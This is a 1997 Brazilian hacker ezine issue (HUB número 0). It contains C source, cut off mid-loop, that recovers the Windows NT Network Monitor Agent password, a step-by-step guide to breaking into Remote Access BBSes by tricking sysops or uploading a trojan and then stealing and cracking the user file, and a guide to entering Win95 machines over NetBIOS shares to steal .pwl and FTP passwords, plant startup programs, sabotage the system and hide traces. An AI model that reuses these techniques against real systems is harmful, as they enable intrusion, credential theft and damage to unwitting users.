Copy Link
Add to Bookmark
Report

HUB 0

eZine's profile picture
Published in 
Hackers Unidos do Brasil
 · 1 year ago

HUB - Hackers Unidos do Brasil - HUB

Número 0, Dezembro de 1997
Editor:

  • Overall

Colaboradores:

  • Cyber Optik,
  • Polamsky,
  • ARG

Temas:

  • Considerações Iniciais
  • Editorial - Hacking no Brasil
  • Definição das Portas TCP
  • Sniffer pro NT (fonte)
  • Hackeando um BBS em Remote Access
  • Servidores Públicos de News Groups
  • Hackeando o Win95
  • Últimas Notícias
  • Créditos e Agradecimentos
  • Avisos

Considerações Iniciais

Seguinte: primeiro número, muitas considerações... Antes de se tentar escrever algo, mas algo novo, a gente nunca sabe a dificuldade e as considerações que estão envolvidas nessa escrita. Linguagem, formato, tamanho, estilo, conteúdo... HTML x TXT puro, curto x longo, hard x soft, linguagem "dus manu" x português arcaico...

Nunca se sabe...

Depois de muita conversa e muita (mesmo) cerveja e algumas doses de Martini pelo meio do caminho chegamos a alguns consensos:

  • Objetivo: transmitir informações que não são facilmente encontradas sem que se leia as entrelinhas. Bugs, exploits, falhas em sistemas operacionais, técnicas de hacking e coisas do tipo serão constantes em nossas páginas virtuais.
  • Linguagem: não usaremos linguagem chula em nossos textos, pois nosso objetivo não é ofender ninguém, mas informar. Apesar de que sempre tem uma hora ou outra que uma linguagenzinha de baixo calão não faz mal à ninguém... eheheh :-)
  • Formato: ainda não definitivamente decidido. Estamos soltando o número 1 no formato HTML para preservarmos a acentuação portuguesa, para termos um mínimo de formatação de texto (negrito, itálico, etc) e para facilitar a divulgação pela web. Apesar de estarmos usando o HTML, não usaremos nenhum recurso que o primeiro Mosaic não possa abrir.
  • Tamanho: pequeno. A idéia é que tenhamos edições frequentes e não muito longas, para facilitar nosso trabalho no levantamento dos dados e para nos certificar que a informação é nova.
  • Estilo: livre. Como temos diversos autores, e aceitamos textos enviados por terceiros, desde que de autoria própria ou traduções, não temos como ter um estilo uniforme. Cada um faz seu estilo. Somos um país livre! Nada de imposições! eheheh...
  • Conteúdo: livre. Desde o assunto tenha a ver com computadores falaremos de tudo um muito e de um muito, tudo. :-)

Bom... Acho que pra começar é isso. Só queria lembrar que nenhum de nós tem filhos em idade de ler e que por isso não, repito NÃO nos responsabilizamos por nenhum, repito NENHUM ato cometido por qualquer pessoa que ler este zine, não importa se foi ou não inspirado no que dissemos, nos arquivos que mencionarmos, nos fontes que dermos ou em qualquer material relacionado à HUB. Se você fizer merda isso é problema seu. Corre pra tua mãe. Se vira! Tô fora, bro...

Editorial - Hacking no Brasil

Brasil, Hacking, Pré-História e feudos são termos intimamente ligados. No brasil eu sinto que não existe o meio termo. Ou o cara come chips de silício no café da manhã e usa a Bíblia do Linux como travesseiro ou não sabe nem onde fica a tecla "any key"... eheheh...É impressionante a quantidade de lammers por esse paizão véio de guerra. Se vc quer encontrar um é só abrir um chat qualquer e logo aparece. Melhor ainda se o chat for sobre hacking. Fico pasmo ao ver a quantidade de gente que aprendeu uma ou duas receitas de bolo e já se consideram os "Super Hackers do Universo"!!

Já me perguntaram "Como faço pra ser hacker?". A resposta é uma só: leia. Leia tudo, leia muito, leia os manuais do que vc compra, seja hardware ou software, leia revistas especializadas, aprenda a programar em tudo o que vc puder.

Quanto mais vc souber sobre linguagens, mais fácil vai ser vc fazer seu próprio hacking, sem ter que usar as receitinhas de bolo de outros. Aqui na HUB nós vamos também fornecer algumas receitas de vez em quando, mas incentivamos sempre que vc leia o que está por trás das receitas.

Se vc tem pretensão de ser um bom hacker, seja antes um bom leitor. Essa é a regra básica.

Outra regra é ser curioso. Nunca se contentar em ver algo funcionando pura e simplesmente, mas ser curioso em saber porque e como aquilo funcionou. Abrir um arquivo fonte e entender o que o cara fez e porque ele fez aquilo.

Por último, e somente se vc estiver com preguiça, use as ferramentas que os outros criaram. Eles as criaram pra facilitar a vida deles próprios, então, porque não usarmos também, não é mesmo... ehehehe :-)

Nice Hacking!

Definição das Portas TCP

Não traduzimos este texto, mas pra parte que importa não é necessária uma tradução... :-)
Apenas grifamos as portas que consideramos mais úteis ou importantes.Ah! Antes que eu me esqueça: esse texto foi tirado da RFC 1010 facilmente encontrada na Internet,
mas como a maior parte dos "raquers" brasileiros tem preguiça de ler textos em inglês ou não conseguiriam mesmo que quisessem, resolvemos colocar isso aqui pra ja ir aquecendo suas turbinas.

Existe na Internet uma série de programas que localizam as portas "abertas" no servidor determinado pelo usuário. Você localiza vários deles (chamados portscan, ou port scanners) em qualquer um dos mirrors do Tucows ou em centenas de outros lugares. Um dos port scanners que eu mais gosto é o "Portscan" da "7th Sphere", também facilmente encontrável na Net. Outra boa ferramenta é o HU, ou Hacker Utilities; um aplicativo que contém uma série de ferramentas básicas que, sabendo usar, podem ser muito úteis.

O que fazer com as portas que você encontrar? eheheh... Isso depende do que você *sabe* fazer...
:-)

Nos próximos números da Hub estaremos mostrando como explorar algumas das portas mais comuns. Fique atento.

Por enquanto teste o portscanner de sua preferência no seu próprio provedor pra ver se ele tem alguma porta aberta. Normalmente os provedores deixam abertas as portas 21 (FTP), 25 (SMTP), e 80 (HTTP). Em alguns provedors novos ou menos competentes vc também encontra algumas portas que te permitem logar no sistema, desde que vc tenha a senha, mas se essa(s) porta estiver aberta já é meio caminho andado.

Fique atento também às portas 23 (Telnet), 49 (Login), e 79 (finger) que também podem ser úteis.

RFC 1010 - Assigned Numbers                                     May 1987 
Port Numbers


PORT NUMBERS Ports are used in the TCP [36,81] to name the ends of logical
connections which carry long term conversations. For the purpose of
providing services to unknown callers, a service contact port is
defined. This list specifies the port used by the server process as
its contact port. The contact port is sometimes called the
"well-known port".

To the extent possible, these same port assignments are used with the
UDP [37,79].

To the extent possible, these same port assignments are used with the
ISO-TP4 [52].

The assigned ports use a small portion of the possible port numbers.
The assigned ports have all except the low order eight bits cleared
to zero. The low order eight bits are specified here.

Port Assignments:

Decimal Keyword Description References
------- ------- ----------- ----------
0 Reserved [JBP]
1-4 Unassigned [JBP]
5 RJE Remote Job Entry [9,JBP]
7 ECHO Echo [70,JBP]
9 DISCARD Discard [69,JBP]
11 USERS Active Users [65,JBP]
13 DAYTIME Daytime [68,JBP]
15 Unassigned [JBP]
17 QUOTE Quote of the Day [75,JBP]
19 CHARGEN Character Generator [67,JBP]
20 FTP-DATA File Transfer [Default Data] [71,JBP]
21 FTP File Transfer [Control] [71,JBP]
23 TELNET Telnet [87,JBP]
25 SMTP Simple Mail Transfer [77,JBP]
27 NSW-FE NSW User System FE [17,RHT]
29 MSG-ICP MSG ICP [63,RHT]
31 MSG-AUTH MSG Authentication [63,RHT]
33 DSP Display Support Protocol [MLC]
35 any private printer server [JBP]
37 TIME Time [83,JBP]
39 RLP Resource Location Protocol [MA]
41 GRAPHICS Graphics [98,JBP]
42 NAMESERVER Host Name Server [74,JBP] 43 NICNAME Who Is [46,JAKE]
44 MPM-FLAGS MPM FLAGS Protocol [JBP]
45 MPM Message Processing Module [recv] [73,JBP]
46 MPM-SND MPM [default send] [73,JBP]
47 NI-FTP NI FTP [103,SK8]
49 LOGIN Login Host Protocol [PHD1] 51 LA-MAINT IMP Logical Address Maintenance [58,AGM]
53 DOMAIN Domain Name Server [61,70,PM1] 55 ISI-GL ISI Graphics Language [6,RB9]
57 any private terminal access [JBP]
59 any private file service [JBP]
61 NI-MAIL NI MAIL [4,SK8]
63 VIA-FTP VIA Systems - FTP [DXD]
65 TACACS-DS TACACS-Database Service [3,RHT]
67 BOOTPS Bootstrap Protocol Server [29,WJC2]
68 BOOTPC Bootstrap Protocol Client [29,WJC2]
69 TFTP Trivial File Transfer [95,DDC1]
71 NETRJS-1 Remote Job Service [8,RTB3]
72 NETRJS-2 Remote Job Service [8,RTB3]
73 NETRJS-3 Remote Job Service [8,RTB3]
74 NETRJS-4 Remote Job Service [8,RTB3]
75 any private dial out service [JBP]
77 any private RJE service [JBP]
79 FINGER Finger [44,KLH]
80 HTTP Hiper Text Transfer Protocol [?]
81 HOSTS2-NS HOSTS2 Name Server [EAK1]
83 MIT-ML-DEV MIT ML Device [DPR]
85 MIT-ML-DEV MIT ML Device [DPR]
87 any private terminal link [JBP]
89 SU-MIT-TG SU/MIT Telnet Gateway [MRC]
91 MIT-DOV MIT Dover Spooler [EBM]
93 DCP Device Control Protocol [DT15]
95 SUPDUP SUPDUP [20,MRC]
97 SWIFT-RVF Swift Remote Vitural File Protocol [MXR]
98 TACNEWS TAC News [FRAN]
99 METAGRAM Metagram Relay [GEOF]
101 HOSTNAME NIC Host Name Server [45,JAKE] 102 ISO-TSAP ISO-TSAP [12,MTR]
103 X400 X400 [HCF2]
104 X400-SND X400-SND [HCF2]
105 CSNET-NS Mailbox Name Nameserver [96,MAS3]
107 RTELNET Remote Telnet Service [76,JBP]
109 POP-2 Post Office Protocol - Version 2 [11,JKR1]
111 SUNRPC SUN Remote Procedure Call [DXG] 113 AUTH Authentication Service [99,MCSJ]
115 SFTP Simple File Transfer Protocol [56,MKL1]
117 UUCP-PATH UUCP Path Service [35,MAE]
119 NNTP Network News Transfer Protocol [53,PL4] 121 ERPC HYDRA Expedited Remote Procedure Call[101,JXO]
123 NTP Network Time Protocol [60,DLM1]
125 LOCUS-MAP Locus PC-Interface Net Map Server [105,BXG]
127 LOCUS-CON Locus PC-Interface Conn Server [105,BXG]
129 PWDGEN Password Generator Protocol [107,FJW]
130 CISCO-FNA CISCO FNATIVE [WXB]
131 CISCO-TNA CISCO TNATIVE [WXB]
132 CISCO-SYS CISCO SYSMAINT [WXB]
133 STATSRV Statistics Service [DLM1]
134 INGRES-NET INGRES-NET Service [MXB]
135 LOC-SRV Location Service [JXP]
136 PROFILE PROFILE Naming System [LLP]
137 NETBIOS-NS NETBIOS Name Service [JBP]
138 NETBIOS-DGM NETBIOS Datagram Service [JBP]
139 NETBIOS-SSN NETBIOS Session Service [JBP]
140 EMFIS-DATA EMFIS Data Service [GB7]
141 EMFIS-CNTL EMFIS Control Service [GB7]
142 BL-IDM Britton-Lee IDM [SXS1]
143-159 Unassigned [JBP]
160-223 Reserved [JBP]
224-241 Unassigned [JBP]
243 SUR-MEAS Survey Measurement [5,AV]
245 LINK LINK [10,RDB2]
247-255 Unassigned [JBP]

Sniffer pro NT (fonte)

Detonando o NT
by Cyber Optik (cyberoptik@base.com.br)Como este é o primeiro número do zine, resolvi pegar leve com a moçada. Este é um pequeno sniffer para Windows NT que qualquer Wannabe com um muito de cérebro, consegue compilar... Lammers fiquem longe disso!!! Pode ser perigoso....(eheheh)

No próximo número vai rolar mais "coisas" sobre NT, valeu!!!

______________________Recorte_Daqui_pra_Baixo__________________________ 
______________________________________________________________________

#define STRICT
#define MAX_FILE_SIZE 24576

#include
#include

void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR
lpszPlaintextPassword);
BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE
lpEncryptedPassword);
void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile);

HANDLE g_hStdIn, g_hStdOut; //Declaracao Global do StandardIN e do OUT

void main(int argc, char* argv[])
{
HANDLE hTargetFile;
BYTE lpEncryptedPassword[32];
char lpszPlaintextPassword[17] = {0};
char lpszOutputBuffer[80];
char lpszTargetFile[MAX_PATH] = {0};
char lpszUsage[] = "\nUsage: NMCrack [path to BHSUPP.DLL incluindo o
filename]\n"
;
LPTSTR lpszSystemDirectory = NULL;
UINT nCount, nCount2;

g_hStdIn = GetStdHandle(STD_INPUT_HANDLE);
g_hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);

if(argc > 1 && argv[1][0] == '/' && argv[1][1] == '?')
{
WriteFile(g_hStdOut, lpszUsage, sizeof(lpszUsage), &nCount, NULL);
ExitProcess(0L);
}

if(argc == 1)
{
nCount = GetSystemDirectory(lpszSystemDirectory, 0);
lpszSystemDirectory = malloc(nCount);
if(lpszSystemDirectory == NULL)
{ WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n",
41, &nCount, NULL);
ExitProcess(1L);
}
GetSystemDirectory(lpszSystemDirectory, nCount);
sprintf(lpszTargetFile, "%s\\bhsupp.dll", lpszSystemDirectory);
free(lpszSystemDirectory);
}
else
{ strcpy(lpszTargetFile, argv[1]); }
hTargetFile = CreateFile(lpszTargetFile, GENERIC_READ, FILE_SHARE_READ
|
FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_FLAG_SEQUENTIAL_SCAN, NULL);

//if not on the commandline or in the system dir ask user for path
if(hTargetFile == INVALID_HANDLE_VALUE && argc == 1)
{ GetTargetFileFromUser(&hTargetFile, lpszTargetFile); }

else if(hTargetFile == INVALID_HANDLE_VALUE)
{
nCount2 = sprintf(lpszOutputBuffer, "\nUnable to open %s\n",
lpszTargetFile);

WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
ExitProcess(1L);
}

if(!GetEncryptedPassword(hTargetFile, lpEncryptedPassword))
{ WriteFile(g_hStdOut, "Unable to retrieve encrypted password\n",
39, &nCount, NULL);

ExitProcess(1L);
}

CloseHandle(hTargetFile);
DecryptPassword(lpEncryptedPassword, lpszPlaintextPassword);
nCount2 = sprintf(lpszOutputBuffer,
"\nThe Network Monitor Agent capture password is %s\n",
lpszPlaintextPassword);
WriteFile(g_hStdOut, lpszOutputBuffer, nCount2, &nCount, NULL);
CloseHandle(g_hStdIn);
CloseHandle(g_hStdOut);
ExitProcess(0L);
}

void DecryptPassword(LPBYTE lpEncryptedPassword, LPSTR
lpszPlaintextPassword)
{
register int outer, inner;
for ( outer = 31; outer >= 0; outer-- )
{ for ( inner = 31; inner >= 0; inner-- )
{ if ( outer != inner )
{ lpEncryptedPassword[inner] ^= lpEncryptedPassword[outer] +
(outer ^ inner) + inner;
} } }

memcpy(lpszPlaintextPassword, lpEncryptedPassword, 16);
lpszPlaintextPassword[16] = 0L;
return;
}

void GetTargetFileFromUser(HANDLE* phTargetFile, LPSTR lpszTargetFile) 
{
char lpszPrompt[] = "\nFull path to BHSUPP.DLL including file name: ";
UINT nCount;
WriteFile(g_hStdOut, lpszPrompt, sizeof(lpszPrompt), &nCount, NULL);
ReadFile(g_hStdIn, lpszTargetFile, MAX_PATH, &nCount, NULL);
lpszTargetFile[nCount - 2] = 0L;
*phTargetFile = CreateFile(lpszTargetFile, GENERIC_READ,
FILE_SHARE_READ |
FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
FILE_FLAG_SEQUENTIAL_SCAN, NULL);

if(*phTargetFile == INVALID_HANDLE_VALUE)
{
WriteFile(g_hStdOut, "Unable to open BHSUPP.DLL\n",
26, &nCount, NULL);
ExitProcess(1L);
} }

BOOL GetEncryptedPassword(HANDLE hTargetFile, LPBYTE
lpEncryptedPassword)
{ LPBYTE lpSearchBuffer;
UINT nCount, i;

lpSearchBuffer = malloc(MAX_FILE_SIZE);
if(lpSearchBuffer == NULL)
{ WriteFile(g_hStdOut, "Memory Allocation Failure - Terminating\n",
41, &nCount, NULL);
ExitProcess(1L);
}

ReadFile(hTargetFile, lpSearchBuffer, MAX_FILE_SIZE, &nCount, NULL);

for(i=0; i

OBS: Se vc nao conseguir compilar, nao me mande emails perguntando como 
se faz isso, desista....

Volta ao início

Hackeando um BBS em Remote Access

Quem nunca se questionou ... "como faço para hackear um BBS que use o Remote Access ?"A resposta e muito mais fácil do que se imagina . E para isso voce não precisa ser um Super Mega
Ultra Hacker !!!

Se voce não fez teste de QI .... faça, se já fez, e ele for inferior a 30, por favor NÃO leia esta matéria
pois irá dar um pequeno nó em seu cérebro de azeitona ! Mas para os outros (QI acima de 30) vamos lá,
vou passar pra vocês um "truquinho" que já me ajudou muito, a um tempo atrás, la vai !

1º Passo = Instale o Terminate (de preferência o 4 ou 5)

2º Passo = Arrume o telefone de um BBS (que use RA é ÓBVIO) não perca seu precioso tempo ligando
para a STI, pois contra esse "bug", eles já estão protegidos à muito tempo. Tenha como preferência BBS’s
pequenas, e novas, por que na maioria desses casos os Sysop’s são umas antas !

3º Passo = Induza o Sysop a instalar o protocolo Puma/Mpt em seu sistema.
Pergunta :Como ?
R: Chaveca o coitado … faz "amizade" com ele e convence ele que será um lucro enorme instalar o Puma,
se ele não for lá muito esperto, cairá fácil, tudo vai depender do seu poder de indução...

Outra forma é colocar o protocolo em um Horse Trojan, e dar um Upload com uma descrição que deixe o
Sysop louquinho pra rodar seu "ARJ 2.76", "PKZIP 3.0" invente alguma coisa que deixaria você com
vontade de puxar o arquivo !

4º Passo = Após o Sysop ter instalado o protocolo Puma /Mtp, conecte no BBS dele, após a conexão,
pressione a tecla SCROLL LOCK , tecla que ativa o "Door Way Mode" e selecione qualquer arquivo do
BBS para download, inicie a transferência normalmente. Durante a transmissão aperte CTRL+A ou ALT+A,
ai vem a a parte boa!!!!!!! Voce vai diretamente para o DOS do BBS em Remote Mode .

5º Passo = Procurem o USERS.BBS e puxem ele!
Tá bom, tá bom, eu sei que o RA tem uma proteção que encripta as senhas impedindo que alguem as
visualize.
Pergunta : E agora... pra que esse trabalho todo se não posso ver as senhas ?????
R: Calma aí nervozinho !!!! Tem um arquivo por aí que quebra as senhas, deixando tudo prontinho pra
você!

Pergunta: onde arrumo o programa ???
R: Procura né … já ajudei de mais, qualquer BBS com arquivos de hacking tem esse arquivinho !

Dica: O nome do arquivo é RAPWD.ARJ (deve haver outros rodando por ai)

Se vc não conseguir … volte ao psicólogo e refaca seu teste de QI!!!
Brincadeirinha !!!!

[]’ ARG
Volta ao início

Servidores Públicos de News Groups

Diversas vezes me perguntaram onde conseguir um servidor gratuito de news groups, por isso resolvi
compilar essa lista pequena somente de endereços onde conseguir um bom acesso à, literalmente, milhares
de News Groups pelo mundo à fora de forma rápida e fácil.Como o site que eu utilizava pra localizar um servidor próximo está temporariamentente fora do ar eu
resovi colocar uma lista de sites onde você pode por conta própria localizar um servidor de sua
preferência. RTFM bro! eheheh...

Overall.Volta ao início

Hackeando o Win95

A Microsoft definitivamente nunca afirmou que o Windows 95 ( ou algum de seus antecessores do DOS) fosse serguro. De fato, eles oferecem produtos diferentes parta pessoas preocupadas com seguranca. Na enorme rede que e a Internet, que cresce dia a dia, deve haver cerca de 1000 usuários novos a cada dia em todo o mundo. Uma grande parte da Internet não é composta apenas por servidores e mainframes, mas sim computadores pessoais, sendo que a maioria deles ultiliza como sistema operacional o programa que Microsoft se orgulha tanto, do qual fez muita propaganda na época de seu lancamento, o Windows 95.Por que os usuários da Internet não se preocupam com a segurança??
Poucas pessoas sabem que todos os recursos de rede estao disponíveis, como padrão, em qualquer coneccao TCP, sendo essa mesmo uma PPP ou SLIP discada para a maioria dos ISP’s. Poucas pessoas filtram as portas apropriadas em seus firewalls, deixando a maioria das máquinas conectadas com acesso livre e completo pelo NetBIOS. Provavelmente, o compartilhamento dos drives e/ou diretórios é muito conveniente, e as pessoas não vêem que estão abrindo as portas de seus computadores para "espertinhos" principalmente, sendo que de cada 3 usuarios, 1 tem o compartilhamento sem as devidas proteções por senha.

Para os usuários que realmente se preocupam com o uso de senhas, na maioria dos casos, utilizam uma senha muito óbvia, e sem precisar se logar, sem demora, ou algum outro problema de hackear senhas, de 3 a 7 senhas podem ser descobertas por segundo através da Net.

Recentemente, um bug foi descoberto na maioria das versões do Windows 95, que causava o travamento do OS, quando uma porção (out-of-band) de dados é enviado para uma porta de TCP. Uma vez que todas as máquinas que rodam o Win 95 reservavam, por padrão, a porta 139 para conecções de NBT, a forma de ataque padrão era conectar-se nesta porta e enviar dados OOB.

A Microsoft correu e lançou um patch que consertava esse bug no Win NT, mas a resposta da empresa para o Win 95 foi muito mais lenta. O patch inicial era lançar um registro que desabilitava NBT e recomendava desligar qualquer outra porta, tal como a 113 (identd). Isso causou com que um grande número de "surfistas virtuais" ficassem invulneráveis a esses ataques. A América Online também começou a filtrar essa porta, tal como a UPD 137 (nbnames), fazendo com que muitos lammers ficassem protegidos. (Still plenty of phish in the c)

Tudo que é preciso para acessar uma máquina através da NBT, é o nome da máquina na configuração do NetBIOS e seu endereco IP. A maravilhosa Microsoft tambem incluiu no Windows 95 e NT, uma ferramenta que vai mostrar as configurações da NetBIOS da máquina remota, incluindo o nome da máquina, login e nome de domínio, os quais quase sempre fazem parte da senha de compartilhamento.

Para acessar uma máquina via de NBT, capture o nome da máquina a ser conectada usando o nbtstat.exe (nbtstat -A ip, sendo que o nome da máquina é geralmente listado primeiro).

Coloque o IP e o nome da máquina num arquivo chamado "lmhosts" no seu diretório do Windows, sendo que cada um fique em uma linha, e pronto, voce conseguirá acessar a outra maquina pelo nome e usar qualquer função de rede, tais como \\maquina, net use \\maquina\res, start \\maquina, ping maquina, winnuke maquina, etc...

Uma vez que o acesso foi conseguido, pelo diretório do Windows (ou pela senha do ADMIN$, ou por qualquer outra), os arquivos de senha podem ser obtidos e decriptados ultilizando uma variação do glide code, e voilá: todas as senhas do usuário, incluindo a das conecções dial-up, qualquer senha da web, e senhas para todos os recursos de rede que eles tenham acessado.

Uma lista dos documentos mais recentes acessados pelo usuário podem ser encontrados na pasta "recent", o desktop pode ser manipulado diretamente pelo diretório "\windows\desktop", bem como o menu Iniciar, pelo diretorio "Start Menu\Programs", se você renomear o diretório de fontes, e resetar a máquina, o windows vai exibit a mensgem: "Não foi possível carregar o gdi.exe. Por favor reinstale o Windows." Não se esqueça de deletar netstat.exe e netwatch.exe para ficar um muito mais invisível.

Pra que isso pode ser útil??

Conseguir contas dial-up no provedor de sua escolha: Procure atraves das conexoes dial-up’s ate achar uma máquina que tenha o diretório do windows compartilhado e copie o(s) arquivo(s) .pwl dela. Quando foi mostrado que o sistema de criptografia dos arquivos .pwl da Microsoft parecia uma brincadeira de crianca, a Microsoft percebeu e lancou um patch, e também nas versões posteriores do Win 95, os arquivos ficaram mais escondidos e, que eu saiba, ninguém conseguiu decriptar o arquivo por enquanto, mas eu não tenho certeza se ainda continuam tentando. Mas mesmo assim, ainda estamos bem. A maoiria das pessoas está ultilizando a versão com o bug, então, continue procurando até conseguir abrir um desses. Algumas senhas também podem ser encontradas em programas de FTP, como o WSFTP, o CuteFTP, e decodificadores podem ser encontrados para seus bancos de dados de senhas. Pegue tudo o que voce quiser; use o IRC para encontrar pessoas que tenham estes recursos disponiveis em seu computador. Use o diretorio "Recent" para encontrar arquivos interessantes, arquivos .lnk, arquivos de atalhos para programas e arquivos que o usuário geralmente ultilize. Também ultilize programas de cliente e servidor de FTP para encontrar diretórios de arquivos downloadados e/ou zipados.

Abra programas na maquina remota: Voce pode colocar links no diretório "Startup" da pessoa para rodar o programa de sua escolha. Os arquivos ".exe" e ".lnk", são particularmente muito úteis, por que eles não aparecem na listagem dos últimos documentos ultilizados, na pasta "Recent". Use isto para criar uma bagunça e ocupar bastante o processador do computador, ou abrir um programna com a mensagem de sua escolha.

Então, concluindo, Uma vez que a única proteção que o usuário pode ultilizar no modo compartilhado é o uso adequado de senhas, estas podem ter no máximo 8 caracteres e não são case-sensitive, escolha uma muito boa, e até a pessoa começar a desconfiar (o que nao vai ser muito dificil), você pode se divertir brincando com os arquivos dos usuários.

* * * Traduzido por Polamsky * * *

Volta ao início

Últimas Notícias

Acaba de ser lançada mais uma versão da Barata Elétrica.Pra quem não sabe, a Barata Elétrica foi a primeira zine hacker Brasileira e seu autor ficou conhecido até
mesmo pela cena hacker Internacional, tendo já participado de encontros na Argentina, na Holanda e EUA.

A Barata Elétrica é considerada por muitos como a fonte básica de consulta e conhecimento Hacker,
tendo ajudado muitos curiosos a se tornarem, se não hackers, pelo menos wannabes, e para outros mostra
o caminho até hoje.

A grande qualidade da Barata Elétrica está em um fato que muitos não aprovam: nela seu autor não passa
nenhuma receitinha de bolo, ele mostra o caminho e incentiva a pesquisa e a curiosidade, que são as atitudes
mais importantes de um verdadeiro hacker.

Você encontra a BE nos seguintes endereços:
http://www.geocities.com/SiliconValley/5620
http://barata-eletrica.home.ml.org
http://hackhour.com.br/textos/ezine/be

Volta ao início

Créditos e Agradecimentos

Gostaria de agradeçer todo pessoal que desde o início tem incentivado a criaçao da HUB, o pessoal que tem ido aos Hack Hour´s e que tem colaborado com idéias, apoio ou outras formas, mas principalmente os colaboradores desta edição:

  • Cyber Optik pelo sniffer para NT
  • ARG pelo texto sobre o RA
  • Polamsky pela tradução do texto sobre hacking no W95

Você encontra a HUB no site do Hack Hour.Se preferir receber a eZine por email, envie email para hub@hackhour.com.br sem subject e com o texto "SEND HUB".

Volta ao início


Nota do Editor: Nós da HUB não incentivamos que você utilize de forma maliciosa, nenhuma das informações contidades nesta publicação. Todo o conteúdo desta eZine foi produzido/traduzido com a intenção de alertá-los dos perigos que todos podem estar correndo se os recursos de rede e compartilhamento que todos utilizamos diariamente não forem utilizados adequadamente. Se vc utilizar estas informações para danificar ou prejudicar qualquer pessoa, máquina ou empresa, nós não nos responsabilizamos por suas atitudes.

Aliás, não nos responsabilizamos por suas atitudes independente de quais foram suas fontes de informações. Antes de utilizar este conhecimento de forma maliciosa, lembre-se apenas de que existem leis internacionais rigorosas para previnir este tipo de atitude.

A HUB não se responsabiliza pelas opiniões e conceitos emitidos em textos assinados. O material produzido pela equipe da HUB não poderá ser reproduzido sem que os créditos do autor e edição apareçam anexados ao mesmo.

Todas as marcas registradas sobre nomes, produtos, equipamentos ou qualquer outra citada nesta edição pertencem á seus respectivos proprietários.

next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT